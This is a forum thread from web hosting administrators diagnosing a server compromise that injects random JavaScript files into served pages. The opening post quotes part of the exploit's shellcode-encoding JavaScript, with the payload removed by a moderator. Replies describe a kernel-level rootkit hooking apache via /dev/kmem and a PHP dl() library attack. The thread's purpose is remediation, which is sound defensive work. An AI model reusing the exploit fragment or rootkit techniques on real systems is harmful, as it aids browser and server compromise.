Results 1 to 25 of 149
-
11-25-2007, 02:37 PM #1WHT Addict
- Join Date
- May 2004
- Location
- chicago
- Posts
- 174
Linux servers having CPANEL - js virus hitting
Hi All,
Earlier this week, our users started reporting that they were getting active-x prompts for Microsoft Data Access Component installation. In addition some of them were getting hit byt the RTSP bug (quicktime) and some were getting the JS/Explot-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple html, php, etc) at times a script tag similar to the one below is inserted right after the <body> tag.
<script language='JavaScript' type='text/javascript' src='shfuy.js'></script>
The javascript file name changes and the problem only occurs at times. There is no set pattern to reproduce the problem although I have noticed that if I connect to the server via a new IP address from my DSL connection, I get the javascript in the source.
I ran some sniffer traces on the server and my laptop. This showed that the javascript was being sent by the server. I was able to capture the javascript (contents of the javascript below).
Solutions tried:
I have checked for the filenames but they do not exist on the server.
1) Have run chkrootkit and rootkit hunter - All clean
2) Have run clamav - All clean
Would appreciate if anybody could provide some inputs on what we might be dealing with and how to resolve the problem.
Javascript code:
var arg="akmukvfd";
var MU = "http://" + window.location.hostname + "/" + arg;
var MH = '';
for (i=0; i < MU.length; i++)
{
var b = MU.charCodeAt (i);
MH = MH + b.toString (16);
}
MH = MH.toUpperCase();
if (Math.round(MU.length/2) != (MU.length/2))
{
MH += '00';
}
var MR = '';
for (i=0; i < MH.length; i += 4)
{
MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
}
var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";
var SB =
<<removed encoded exploit>>
document.write (SB);
Thanks,
Regards
Rushik ShahLast edited by bear; 11-25-2007 at 09:59 PM. Reason: Pointless to help spread this
CEO - Alakmalak Technologies www.Alakmalak.com
Web Application Development : Website Development Web Designing
Support Toll Free +1-800-789-9620 Skype : rushik Operating Since 2003 || Team size of 35+ Web development center at INDIA
-
11-25-2007, 02:49 PM #2Web Hosting Master
- Join Date
- Apr 2001
- Location
- Paradise
- Posts
- 12,052
Anybody have the FTP information of all the accounts having this problem? it may be possible that a compromised computer were infecting those sites without even knew it.
█ Shared Web Hosting - Reseller Hosting - Semi-Dedicated Servers - SolusVM/XEN VPS
█ LiteSpeed Powered - R1Soft Continuous Data Protection - 24/7 Chat/Email/Helpdesk Support
█ Cpanel/WHM - Softaculous - R1soft Backup - Litespeed - Cloudlinux -Site Builder- SSH support - Account Migration
█ DowntownHost LLC - In Business since 2001- West/Center/East USA - Netherlands - Singapore
-
11-25-2007, 02:51 PM #3Web Hosting Master
- Join Date
- Oct 2003
- Posts
- 9,264
It's more than likely it was just a deface of the specific account. Doubtful that it's an end-user's system being exploited and then FTPing up the data, far too much effort
-
11-25-2007, 03:02 PM #4WHT Addict
- Join Date
- May 2004
- Location
- chicago
- Posts
- 174
Hi Jedito / David
Thanks for your quick reply. Actually I already did this check
I changed ftp passwords, but still it got effected after 3-4 days again.
The matter of fact is almost all websites on the server are affected. Mostly the index . html, php files
Any clue
Thanks!
Regards
Rushik ShahCEO - Alakmalak Technologies www.Alakmalak.com
Web Application Development : Website Development Web Designing
Support Toll Free +1-800-789-9620 Skype : rushik Operating Since 2003 || Team size of 35+ Web development center at INDIA
-
11-25-2007, 03:09 PM #5Web Hosting Master
- Join Date
- Apr 2001
- Location
- Paradise
- Posts
- 12,052
There's an trojan which does this automatically, the trojan infect the computer and pickup all the FTP book of any FTP program installed in the computer, it does send it to the "hacker" which lately use it to upload the infected data, this happened to one of my resellers awhile ago.
to the OP, check on the FTP logs of the affected account which files were uploaded and check if the IP uploading those files mismatch in all them.█ Shared Web Hosting - Reseller Hosting - Semi-Dedicated Servers - SolusVM/XEN VPS
█ LiteSpeed Powered - R1Soft Continuous Data Protection - 24/7 Chat/Email/Helpdesk Support
█ Cpanel/WHM - Softaculous - R1soft Backup - Litespeed - Cloudlinux -Site Builder- SSH support - Account Migration
█ DowntownHost LLC - In Business since 2001- West/Center/East USA - Netherlands - Singapore
-
11-25-2007, 04:21 PM #6Web Hosting Evangelist
- Join Date
- Jul 2005
- Location
- Belgium
- Posts
- 507
Hi,
Which platforms does this trojan infects? Do you know its name?
Thanks,
sashkept alive by vertaalbureau
-
11-25-2007, 07:21 PM #7Junior Guru Wannabe
- Join Date
- Nov 2007
- Posts
- 51
Is there a way to stop this from happening on a cpanel server?
-
11-25-2007, 08:42 PM #8Web Hosting Master
- Join Date
- Apr 2005
- Posts
- 1,767
Looks like a buffer overflow JS exploit. NoScript stops it, but I would do this:
find / -name *.js | xargs grep unescape
-
11-25-2007, 08:46 PM #9the ground beneath my feet
- Join Date
- Feb 2006
- Posts
- 1,107
The code is here: <<snipped>>
Last edited by anon-e-mouse; 11-25-2007 at 09:04 PM.
semi-retired
-
11-25-2007, 08:57 PM #10Web Hosting Master
- Join Date
- Apr 2005
- Posts
- 1,767
Also, check xferlog and see who uploaded it.
-
11-25-2007, 09:04 PM #11Web Hosting Master
- Join Date
- May 2003
- Location
- Kirkland, WA
- Posts
- 4,448
To clarify, there is absolutely no evidence provided that this is at all isolated to cPanel even if it is in fact an issue.
-
11-25-2007, 09:05 PM #12Web Hosting Master
- Join Date
- Apr 2005
- Posts
- 1,767
Don't paste code like that on a public forum.
-
11-25-2007, 09:43 PM #13the ground beneath my feet
- Join Date
- Feb 2006
- Posts
- 1,107
-
11-25-2007, 10:00 PM #14
-
11-28-2007, 06:58 AM #15Aspiring Evangelist
- Join Date
- Sep 2003
- Location
- Europe
- Posts
- 398
Hello Rushik,
I can second your findings. The exploit appears all the time on different pages (the page indicated by KIS keeps changing, usually HTML) and it doesn't appear twice for the same IP and this seems to me to be related to IE only. Have you discovered anything new?
Looks like a buffer overflow JS exploit. NoScript stops it, but I would do this:
find / -name *.js | xargs grep unescape
Any clue anyone?
Thanks and regards!Last edited by bear; 11-28-2007 at 07:27 AM.
-
11-29-2007, 01:34 AM #16WHT Addict
- Join Date
- May 2004
- Location
- chicago
- Posts
- 174
Hi Andy,
I am still trying to find out what would be best way to get it out. As i tried to consult many data centers companies, but the only solution they think of is OS reload.
Let me know if you find anything.
Any help from anybody would be greatly appreciated.
Thanks!
Regards
RushikCEO - Alakmalak Technologies www.Alakmalak.com
Web Application Development : Website Development Web Designing
Support Toll Free +1-800-789-9620 Skype : rushik Operating Since 2003 || Team size of 35+ Web development center at INDIA
-
11-29-2007, 10:34 AM #17Keep rockin' in the free world
- Join Date
- May 2002
- Location
- Kingston, Ontario
- Posts
- 1,588
You need to scan all your user accounts for malicious files, not just .js now. An OS reload isn't needed in this case unless you've been rooted which is uncommon in this type of attack.
-
11-30-2007, 03:17 AM #18Aspiring Evangelist
- Join Date
- Sep 2003
- Location
- Europe
- Posts
- 398
Hello Ramprage,
This has absolutely nothing to do with the site itself. One simple test confirms it. Create a new account in WHM, upload a HTML file that is not even HTML (just plain text), change your IP and when you try to visit the "page", it already contains a 5 random character name .js inclusion that can be seen only in browser by viewing the source but not on the server. It gets added somehow on the fly...
Regards!
-
11-30-2007, 03:29 AM #19Engineer
- Join Date
- Jan 2005
- Location
- Scotland, UK
- Posts
- 2,681
I know what exploit this is, it injects at the kernel level. You can find it by writing a module for the kernel that lists all loaded modules (it will be hidden from /proc/modules), you also verify it's the same thing by trying to create a file/directory that starts with a number you should get something to the effect of "No such file/directory" (this is part of the rootkit) - otherwise you can go for the quick fix and that is to get a working grsec version that protects writing to /dev/kmem, but good luck compiling because of the number at the start of the file/directories. There are quite a few variants of this some even stop /boot/map from being written so you'll struggle to even get a new kernel without a rescue cd.
Server Management - AdminGeekZ.com
Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implimentation, DDoS Protection, Custom Nginx Modules
Check our wordpress varnish plugin. Contact us for quote: sales@admingeekz.com
-
01-04-2008, 04:00 PM #20WHT Addict
- Join Date
- May 2004
- Location
- chicago
- Posts
- 174
Hi All,
I wanted to see if anybody got some more insight on the same to resolve the issue.
Thanks!
Regards
RushikCEO - Alakmalak Technologies www.Alakmalak.com
Web Application Development : Website Development Web Designing
Support Toll Free +1-800-789-9620 Skype : rushik Operating Since 2003 || Team size of 35+ Web development center at INDIA
-
01-04-2008, 05:58 PM #21Web Hosting Master
- Join Date
- Apr 2002
- Location
- Auckland - New Zealand
- Posts
- 1,575
You don't have
enable_dl = 1 or yes do you in your php.ini?
If you do, disable it!
The old php hack loading a nasty library can do this, search flame.so (google,wht etc)
-
01-05-2008, 12:37 AM #22Junior Guru Wannabe
- Join Date
- Feb 2003
- Location
- Portland, OR
- Posts
- 81
dotable steve - thank you for the info on flame.so, google turned up a great page about it.
However, although one of my machines has all of the symptoms, I'm not able to find a flame.so or flame.anything on my server. Do you know of another file name the attackers may be using now?
-
01-05-2008, 12:49 AM #23Web Hosting Master
- Join Date
- Apr 2002
- Location
- Auckland - New Zealand
- Posts
- 1,575
First off, Just disable enable_dl in your php.ini and restart apache.
Does that solve the problem? Is the injection now solved?
After,
Try locate *.so or find, anything in /home with .so (but could be called anything) is due a closer inspection..
Also turning on error logging for php after disabling enable_dl might turn up where the scripts are if they exist, as you'll see attempts to load a dl in the error_log
error_log = /var/log/php_error_log
As an exampleLast edited by StevenG; 01-05-2008 at 12:56 AM.
-
01-05-2008, 12:56 AM #24Junior Guru Wannabe
- Join Date
- Feb 2003
- Location
- Portland, OR
- Posts
- 81
-
01-05-2008, 07:28 AM #25Engineer
- Join Date
- Jan 2005
- Location
- Scotland, UK
- Posts
- 2,681
The post I made above does actually explain pretty much the most common symptoms (it's not flame.so for the thread starter) more specfically you'll notice it by monitoring your packet logs for 5 letter javascript files being outputted in html, these are random 5 digits each time a page loads and are only showed once per IP. Which is done by the exploit hooking into apache by writing to /dev/kmem.
The simplest fix is to just go for a grsec kernel that protects /dev/kmem but you'll likely need to boot into a rescue cd and compile that way because from what i've seen so far it will either invoke a panic when you are compiling or like I said above it prevents directories with numbers from being created.
Not seen flame.so in awhile myself personally but k2host you would need to explain symptoms simply because theres so many varients and so many different things it could be.Server Management - AdminGeekZ.com
Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implimentation, DDoS Protection, Custom Nginx Modules
Check our wordpress varnish plugin. Contact us for quote: sales@admingeekz.com